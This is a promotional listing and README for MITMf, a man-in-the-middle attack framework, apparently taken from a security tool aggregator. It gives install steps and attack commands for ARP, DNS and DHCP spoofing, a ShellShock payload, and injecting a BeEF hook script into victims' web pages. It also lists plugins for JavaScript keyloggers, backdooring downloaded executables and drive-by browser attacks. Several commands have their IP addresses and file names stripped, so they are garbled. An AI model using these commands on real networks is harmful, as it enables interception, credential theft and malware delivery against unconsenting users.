Man In The Middle Attack Framework: MITMf

ID N0WHERE:22399
Type n0where
Reporter N0where
Modified 2015-08-30T18:45:33


Man In The Middle Attack Framework

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques. Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it’s been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.

MITMf v0.9.8 has been released

Man In The Middle Attack Framework: MITMf


  • The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
  • The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds , which is run on startup.
  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!). For example, here’s a stupid little filter that just changes the destination IP address of ICMP packets:

if packet.haslayer(ICMP):'Got an ICMP packet!')
    packet.dst = ''
  • Use the packet variable to access the packet in a Scapy compatible format
  • Use the data variable to access the raw packet data

Now to use the filter all we need to do is: python -F ~/

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else 😉 Note that you can modify filters on-the-fly without restarting MITMf!


MITMf relies on a LOT of external libraries therefore it is highly recommended you use virtualenvs to install the framework, this avoids permission issues and conflicts with your system site packages (especially on Kali Linux).

Before starting the installation process:

  • On Arch Linux:

    pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo

  • On Debian and derivatives (e.g Ubuntu, Kali Linux etc…)

    apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev

Installing MITMf

Note: if you’re rocking Arch Linux: you’re awesome! Just remember to use pip2 instead of pip outside of the virtualenv

  • Install virtualenvwrapper:

    pip install virtualenvwrapper

  • Edit your .bashrc or .zshrc file to source the script:

    source /usr/bin/

The location of this script may vary depending on your Linux distro

  • Restart your terminal or run:

    source /usr/bin/

  • Create your virtualenv:

    mkvirtualenv MITMf -p /usr/bin/python2.7

  • Clone the MITMf repository:

    git clone

  • cd into the directory, initialize and clone the repos submodules:

    cd MITMf && git submodule init && git submodule update --recursive

  • Install the dependencies:

    pip install -r requirements.txt

  • You’re ready to rock!

    python --help


The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:

python -i enp3s0

ARP poison the whole subnet with the gateway at using the Spoof plugin:

python -i enp3s0 --spoof --arp --gateway

Same as above + a WPAD rogue proxy server using the Responder plugin:

python -i enp3s0 --spoof --arp --gateway --responder --wpad

ARP poison and with the gateway at

python -i enp3s0 --spoof --arp --target, --gateway

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python -i enp3s0 --spoof --dns --arp --target --gateway

Enable LLMNR/NBTNS/MDNS spoofing:

python -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python -i enp3s0 --inject --html-url

Inject a JS script:

python -i enp3s0 --inject --js-url http://beef:3000/hook.js

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run python –help

Man In The Middle Attack Framework: MITMf documumentation

Currently available plugins

  • HTA Drive-By

Injects a fake update notification and prompts clients to download an HTA application

  • SMBTrap

Exploits the ‘SMB Trap’ vulnerability on connected clients

  • ScreenShotter

Uses HTML5 Canvas to render an accurate screenshot of a clients browser

  • Responder

LLMNR, NBT-NS, WPAD and MDNS poisoner

  • SSLstrip+

Partially bypass HSTS

  • Spoof

Redirect traffic using ARP, ICMP, DHCP or DNS spoofing

  • BeEFAutorun

Autoruns BeEF modules based on a client’s OS or browser type

  • AppCachePoison

Performs HTML5 App-Cache poisoning attacks

  • Ferret-NG

Transperently hijacks client sessions

  • BrowserProfiler

Attempts to enumerate all browser plugins of connected clients

  • FilePwn

Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy

  • Inject

Inject arbitrary content into HTML content

  • BrowserSniper

Performs drive-by attacks on clients with out-of-date browser plugins

  • JSkeylogger

Injects a Javascript keylogger into a client’s webpages

  • Replace

Replace arbitary content in HTML content

  • SMBAuth

Evoke SMB challenge-response authentication attempts

  • Upsidedownternet

Flips images 180 degrees

Man In The Middle Attack Framework: MITMf Download